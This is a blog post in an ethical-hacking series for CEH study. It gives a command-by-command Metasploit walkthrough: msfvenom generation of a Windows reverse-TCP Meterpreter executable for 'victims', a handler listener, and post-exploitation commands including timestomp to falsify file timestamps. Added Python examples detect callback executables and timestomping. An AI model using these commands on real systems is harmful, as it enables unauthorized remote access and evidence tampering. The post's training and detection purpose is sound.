Ethical Hacking – Metasploit

During the CEH v10 certification you will get to know a lot of tools that help you with the 5 phases of a hack.

One of the most valuable tools out there is Metasploit.

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

I will go through some of the ways you can use Metasploit to your advantage.

This post is part of a series called “Ethical Hacking”.


How-To Use Metasploit

To open the Metasploit console in Kali Linux, run the following in a terminal.

  • msfconsole
    • Starts the Metasploit Console.

You are able to search for modules by using.

  • search <keyword>
    • Lists the modules whose name or description matches the keyword.

When you want to use a module (in this example we are using SNMP enumeration), then type.

  • use auxiliary/scanner/snmp/snmp_enum
    • Loads the module so its options can be set.

It can be difficult to remember all the different features and functions (options) within a module. To list them, use.

  • show options
    • Shows the module's options, their current values and whether they are required.

When you want to set an option (in this example we set RHOSTS with an IP address in the “auxiliary/scanner/snmp/snmp_enum” module).

  • set RHOSTS <ip>
    • Sets the target address(es) the module will scan.

To execute the module use.

  • run
    • Runs the module against the configured target (exploit does the same).


How-To Create a Payload

To create a payload for victims.

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> --format=exe > <filename.exe>
    • -p windows/meterpreter/reverse_tcp = Use a reverse TCP Meterpreter payload (the victim connects back to the listener).
    • LHOST = Which IP/DNS name the payload should contact.
    • LPORT = Which port the payload should contact.
    • --format = Which output format should be used.
    • > = Write the output to the given file name.
  • service apache2 start
    • Starts the Apache2 web server (used to host the generated file).

Open the Metasploit Console.

  • msfconsole
    • Starts the Metasploit Console.

Now we need to establish a listener for the payload we created with msfvenom.

  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
      • Choose which payload is used on the victim.
    • set LHOST <ip>
      • Choose what IP to listen on.
    • set LPORT <port>
      • Choose what port to listen on.
    • exploit -j -z
      • exploit = Start the exploit.
      • -j = Run in context of a job.
      • -z = Do not interact with the session after successful exploitation.

When the victim opens the payload, it will automatically connect to the server. You can now interact with the session with the following commands.
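The flow above ends with a downloaded executable connecting back to LHOST:LPORT. Seen from the defender's side, that is what lands in endpoint telemetry: a process started from a user-writable path that opens an outbound connection within seconds of launching. The following is an added example, not code from the original post or from Metasploit, that runs exactly that check over constructed process and network events. The event field names, the user-writable path hints, the 30-second window and the "common port" list are assumptions chosen for illustration.

```python
"""Flag 'downloaded executable calls home' behaviour in endpoint telemetry.

Added example, not code from the original post or from Metasploit. The event
records below are constructed and their field names (ts, type, pid, image,
dst_ip, dst_port) are an assumed, simplified schema, not a real product's.
"""
from datetime import datetime, timedelta

# Path fragments typical of places a user drops a freshly downloaded file.
USER_WRITABLE_HINTS = ("\\downloads\\", "\\temp\\", "\\appdata\\", "\\desktop\\")
# Destination ports that ordinary desktop software commonly uses outbound;
# a callback to anything else raises the severity (assumed heuristic).
COMMON_PORTS = {80, 443, 53, 25, 587, 993, 995, 22, 123}
WINDOW = timedelta(seconds=30)

# Constructed sample events: one suspicious download, one browser, one
# installer on a common port. Addresses are documentation ranges (RFC 5737).
EVENTS = [
    {"ts": "2024-01-10T09:00:01", "type": "process", "pid": 4120,
     "image": r"C:\Users\alice\Downloads\invoice.exe"},
    {"ts": "2024-01-10T09:00:03", "type": "network", "pid": 4120,
     "image": r"C:\Users\alice\Downloads\invoice.exe",
     "dst_ip": "203.0.113.10", "dst_port": 4444},
    {"ts": "2024-01-10T09:05:00", "type": "process", "pid": 5200,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"ts": "2024-01-10T09:05:02", "type": "network", "pid": 5200,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
    {"ts": "2024-01-10T09:10:00", "type": "process", "pid": 6100,
     "image": r"C:\Users\bob\AppData\Local\Temp\setup.exe"},
    {"ts": "2024-01-10T09:10:05", "type": "network", "pid": 6100,
     "image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "dst_ip": "198.51.100.9", "dst_port": 443},
]


def from_user_writable_path(image: str) -> bool:
    """True if the executable lives somewhere an unprivileged user can write."""
    lowered = image.lower()
    return any(hint in lowered for hint in USER_WRITABLE_HINTS)


def find_callbacks(events, window=WINDOW):
    """Return (pid, image, 'ip:port', severity) for every process that was
    started from a user-writable path and opened an outbound connection
    within `window` of starting."""
    started = {e["pid"]: datetime.fromisoformat(e["ts"])
               for e in events if e["type"] == "process"}
    hits = []
    for e in events:
        if e["type"] != "network" or e["pid"] not in started:
            continue
        age = datetime.fromisoformat(e["ts"]) - started[e["pid"]]
        if not timedelta(0) <= age <= window:
            continue
        if not from_user_writable_path(e["image"]):
            continue
        # Uncommon destination port on top of the path/timing match: high.
        severity = "high" if e["dst_port"] not in COMMON_PORTS else "medium"
        hits.append((e["pid"], e["image"],
                     f'{e["dst_ip"]}:{e["dst_port"]}', severity))
    return hits


if __name__ == "__main__":
    for pid, image, dst, sev in find_callbacks(EVENTS):
        print(f"[{sev}] pid {pid} {image} -> {dst}")
```

The browser is ignored because it runs from Program Files; the installer is reported at medium severity because it connects on 443 from a temp directory, and the downloaded invoice.exe is reported at high severity. In real telemetry the process start and the connection come from different event sources, so joining on pid alone is only safe within a short window, which is why the check keys on timing.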

To see which sessions are connected to the handler.

  • sessions -l
    • Displays all sessions.

You can now interact with a specific session.

  • sessions -i <session id>
    • Interact with a specific session.

If you want to know what folder you are at on the victim.

  • pwd
    • See what folder you are in on the victim.

You can also get more information on a machine by using the following.

  • sysinfo
    • Gets computer name, OS, architecture, system language, domain etc.

See the current ip configuration on the victim.

  • ipconfig
    • Show all network interfaces.

Get the user that launched the file.

  • getuid
    • Displays the current user interacting with the session.

See or manipulate the timestamps on a file.

  • timestomp <filename>
    • Manipulate the timestamps of files on the victim machine.
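Because timestomp rewrites the timestamps a user-mode API can reach ($STANDARD_INFORMATION) but not the second copy NTFS keeps in $FILE_NAME, a forensic examiner compares the two. The following is an added example, not code from the original post or from Metasploit, that applies two indicators to constructed MFT-style records: an SI creation time earlier than the FN creation time, and SI times whose 100 ns fraction is zero on every field, which tools that accept whole-second input leave behind. The record layout, field names and sample values are all constructed for illustration.

```python
"""Spot $STANDARD_INFORMATION timestamps that disagree with $FILE_NAME.

Added example, not code from the original post or from Metasploit. The records
are constructed: each file carries two MACB sets as FILETIME ticks (100 ns since
1601-01-01 UTC), a simplified stand-in for the two NTFS attributes.
"""
from datetime import datetime, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000


def filetime(year, month, day, hour=0, minute=0, second=0, frac_ticks=0):
    """Build a FILETIME value from a whole-second UTC time plus sub-second ticks."""
    whole = datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)
    seconds = int((whole - FILETIME_EPOCH).total_seconds())
    return seconds * TICKS_PER_SECOND + frac_ticks


def macb(m, a, c, b):
    """Modified, Accessed, MFT-changed, Born."""
    return {"M": m, "A": a, "C": c, "B": b}


# Constructed records. 'si' plays $STANDARD_INFORMATION (what SetFileTime-style
# tools such as timestomp rewrite), 'fn' plays $FILE_NAME (kernel-maintained).
_born = filetime(2024, 1, 10, 9, 0, 0, 1234567)
_edit = filetime(2024, 1, 12, 14, 3, 7, 4419871)
_fake = filetime(2019, 6, 1, 12, 0, 0)          # whole second, no fraction
RECORDS = [
    {"name": "report.docx",
     "si": macb(_edit, _edit, _edit, _born), "fn": macb(_born, _born, _born, _born)},
    {"name": "invoice.exe",
     "si": macb(_fake, _fake, _fake, _fake), "fn": macb(_born, _born, _born, _born)},
    {"name": "installer.log",  # one whole-second field alone is not enough
     "si": macb(filetime(2024, 1, 11, 8, 0, 0), _edit, _edit, _born),
     "fn": macb(_born, _born, _born, _born)},
]


def flags_for(rec):
    si, fn = rec["si"], rec["fn"]
    flags = []
    # $FILE_NAME is written by the kernel at creation (and refreshed on rename or
    # move) and is not reachable through SetFileTime, so an SI birth time that
    # precedes the FN birth time means SI was pushed back after the fact.
    if si["B"] < fn["B"]:
        flags.append("si_created_before_fn")
    # Tools that take timestamps as whole seconds leave the 100 ns fraction at 0
    # on every field they set; genuine filesystem activity almost never does.
    if all(t % TICKS_PER_SECOND == 0 for t in si.values()):
        flags.append("si_whole_seconds")
    return flags


def analyze(records):
    """Map file name -> list of timestomping indicators (empty list = clean)."""
    return {r["name"]: flags_for(r) for r in records}


if __name__ == "__main__":
    for name, flags in analyze(RECORDS).items():
        print(f"{name}: {', '.join(flags) or 'no indicators'}")
```

In practice the records come from an MFT parser rather than being typed in, and a clean result is absence of evidence rather than proof: $FILE_NAME is refreshed whenever a file is renamed or moved, so the comparison is strongest when combined with other sources such as the USN journal or $LogFile.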

For more commands check this text document.


How-to Create a Trojan


Experienced advanced operations engineer with a demonstrated history of working in the information technology and services industry. Skilled in Windows Server, Azure, Ethical Hacking, Office 365, Exchange, Jenkins, SCCM, Octopus Deploy and PowerShell to name a few. Strong engineering professional with a big passion for knowledge.
